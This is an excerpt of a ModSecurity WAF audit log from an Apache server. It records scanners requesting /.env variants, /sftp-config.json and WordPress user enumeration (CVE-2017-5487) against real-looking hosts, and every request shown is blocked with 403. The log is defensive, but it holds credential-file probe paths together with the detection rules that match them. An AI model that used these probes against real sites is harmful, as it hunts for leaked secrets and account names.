p2=0, p3=0, p4=0, p5=41, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40c5704e-Z-- --8ea0da4d-A-- [01/Jun/2025:20:54:18 +0700] aDxbiu4LjVe0Eerk_ZbaegAAAFY 103.236.140.4 42334 103.236.140.4 8181 --8ea0da4d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.157.114.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.157.114.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8ea0da4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ea0da4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748786058863747 2393 (- - -) Stopwatch2: 1748786058863747 2393; combined=1344, p1=419, p2=886, p3=0, p4=0, p5=39, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ea0da4d-Z-- --fdd33b0d-A-- [01/Jun/2025:20:57:28 +0700] aDxcSAQHT18O7PnXxsRgKAAAAJc 103.236.140.4 46838 103.236.140.4 8181 --fdd33b0d-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --fdd33b0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdd33b0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748786248648427 848 (- - -) Stopwatch2: 1748786248648427 848; combined=303, p1=252, p2=0, p3=0, p4=0, p5=51, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdd33b0d-Z-- --93da3c2f-A-- [01/Jun/2025:23:48:23 +0700] aDyEVwQ4kZQGAOBHoB7e_wAAAMA 103.236.140.4 53004 103.236.140.4 8181 --93da3c2f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15 Accept-Charset: utf-8 --93da3c2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93da3c2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748796503825674 818 (- - -) Stopwatch2: 1748796503825674 818; combined=380, p1=336, p2=0, p3=0, p4=0, p5=43, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93da3c2f-Z-- --6ac19018-A-- [02/Jun/2025:00:07:21 +0700] aDyIyQQHT18O7PnXxsSoCAAAAIk 103.236.140.4 45148 103.236.140.4 8181 --6ac19018-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 154.222.132.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.222.132.2 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6ac19018-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ac19018-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748797641106913 4149 (- - -) Stopwatch2: 1748797641106913 4149; combined=2233, p1=662, p2=1529, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ac19018-Z-- --3b73241f-A-- [02/Jun/2025:00:13:23 +0700] aDyKM-4LjVe0Eerk_ZYt4AAAAEw 103.236.140.4 47882 103.236.140.4 8181 --3b73241f-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 167.71.81.114 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 167.71.81.114 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --3b73241f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b73241f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748798003385401 781 (- - -) Stopwatch2: 1748798003385401 781; combined=283, p1=250, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b73241f-Z-- --5eb36c09-A-- [02/Jun/2025:01:13:09 +0700] aDyYNQQ4kZQGAOBHoB5AUAAAAMU 103.236.140.4 41714 103.236.140.4 8181 --5eb36c09-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.187.152.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.187.152.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5eb36c09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5eb36c09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748801589850421 3814 (- - -) Stopwatch2: 1748801589850421 3814; combined=2103, p1=638, p2=1429, p3=0, p4=0, p5=35, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5eb36c09-Z-- --6a3b1d3e-A-- [02/Jun/2025:01:17:32 +0700] aDyZPAQ4kZQGAOBHoB5E_QAAANA 103.236.140.4 35598 103.236.140.4 8181 --6a3b1d3e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 34.83.193.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 34.83.193.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6a3b1d3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a3b1d3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748801852176192 3664 (- - -) Stopwatch2: 1748801852176192 3664; combined=1908, p1=570, p2=1304, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a3b1d3e-Z-- --42bb0528-A-- [02/Jun/2025:01:32:30 +0700] aDycvgQHT18O7PnXxsQSlwAAAJY 103.236.140.4 53986 103.236.140.4 8181 --42bb0528-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 112.198.178.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 112.198.178.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --42bb0528-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42bb0528-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748802750948920 3760 (- - -) Stopwatch2: 1748802750948920 3760; combined=2185, p1=665, p2=1480, p3=0, p4=0, p5=39, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42bb0528-Z-- --76ef7175-A-- [02/Jun/2025:02:13:33 +0700] aDymXUaTRmdfB-FaJjkEQAAAABA 103.236.140.4 35288 103.236.140.4 8181 --76ef7175-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; Nexus 9 Build/NRD90R) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Safari/537.36 Accept-Charset: utf-8 --76ef7175-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76ef7175-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748805213258867 940 (- - -) Stopwatch2: 1748805213258867 940; combined=428, p1=362, p2=0, p3=0, p4=0, p5=65, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76ef7175-Z-- --9141cc52-A-- [02/Jun/2025:03:15:20 +0700] aDy02EaTRmdfB-FaJjlPswAAAAA 103.236.140.4 35476 103.236.140.4 8181 --9141cc52-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 8.130.160.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 8.130.160.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9141cc52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9141cc52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748808920053284 3709 (- - -) Stopwatch2: 1748808920053284 3709; combined=1658, p1=650, p2=962, p3=0, p4=0, p5=46, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9141cc52-Z-- --f84b3c42-A-- [02/Jun/2025:03:27:19 +0700] aDy3p0aTRmdfB-FaJjlV3AAAAA0 103.236.140.4 39070 103.236.140.4 8181 --f84b3c42-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 88.81.77.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 88.81.77.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f84b3c42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f84b3c42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748809639361157 2691 (- - -) Stopwatch2: 1748809639361157 2691; combined=1166, p1=366, p2=777, p3=0, p4=0, p5=23, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f84b3c42-Z-- --a83eaa73-A-- [02/Jun/2025:03:36:43 +0700] aDy529G4Cudp_oIcbnOiuAAAAAU 103.236.140.4 51382 103.236.140.4 8181 --a83eaa73-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.2; en-us; sdk Build/MR1) AppleWebKit/535.19 (KHTML, like Gecko) Version/4.2 Safari/535.19 Accept-Charset: utf-8 --a83eaa73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a83eaa73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748810203800491 1146 (- - -) Stopwatch2: 1748810203800491 1146; combined=384, p1=343, p2=0, p3=0, p4=0, p5=41, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a83eaa73-Z-- --95d2a457-A-- [02/Jun/2025:03:49:00 +0700] aDy8vNG4Cudp_oIcbnOixgAAAAg 103.236.140.4 51448 103.236.140.4 8181 --95d2a457-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.236.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.236.252 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --95d2a457-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95d2a457-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748810940610915 729 (- - -) Stopwatch2: 1748810940610915 729; combined=303, p1=272, p2=0, p3=0, p4=0, p5=31, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95d2a457-Z-- --10242c76-A-- [02/Jun/2025:03:54:30 +0700] aDy-BtG4Cudp_oIcbnOi0wAAAAc 103.236.140.4 51504 103.236.140.4 8181 --10242c76-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 196.251.67.143 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 196.251.67.143 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --10242c76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10242c76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748811270259161 898 (- - -) Stopwatch2: 1748811270259161 898; combined=361, p1=322, p2=0, p3=0, p4=0, p5=39, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10242c76-Z-- --24bb9875-A-- [02/Jun/2025:04:17:17 +0700] aDzDXe6eDjh4wF4csdthzgAAAJg 103.236.140.4 51646 103.236.140.4 8181 --24bb9875-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1 Accept-Charset: utf-8 --24bb9875-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24bb9875-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748812637279465 1055 (- - -) Stopwatch2: 1748812637279465 1055; combined=348, p1=309, p2=0, p3=0, p4=0, p5=38, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24bb9875-Z-- --df91ab0e-A-- [02/Jun/2025:04:23:33 +0700] aDzE1X8VMK8tZef_-m_JQwAAAEU 103.236.140.4 51760 103.236.140.4 8181 --df91ab0e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.241.129.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.241.129.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --df91ab0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df91ab0e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748813013255763 3943 (- - -) Stopwatch2: 1748813013255763 3943; combined=1565, p1=561, p2=972, p3=0, p4=0, p5=32, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df91ab0e-Z-- --0169c620-A-- [02/Jun/2025:04:54:28 +0700] aDzMFH8VMK8tZef_-m_JYAAAAE8 103.236.140.4 51944 103.236.140.4 8181 --0169c620-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --0169c620-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0169c620-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748814868502961 985 (- - -) Stopwatch2: 1748814868502961 985; combined=398, p1=354, p2=0, p3=0, p4=0, p5=44, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0169c620-Z-- --0e48d213-A-- [02/Jun/2025:05:00:25 +0700] aDzNee6eDjh4wF4csdth7AAAAIU 103.236.140.4 51982 103.236.140.4 8181 --0e48d213-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.241.208.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.241.208.204 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --0e48d213-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e48d213-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748815225538135 2334 (- - -) Stopwatch2: 1748815225538135 2334; combined=1055, p1=368, p2=661, p3=0, p4=0, p5=26, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e48d213-Z-- --c683f73e-A-- [02/Jun/2025:05:19:00 +0700] aDzR1EA6be0-boUGPH14DAAAAM0 103.236.140.4 52266 103.236.140.4 8181 --c683f73e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: 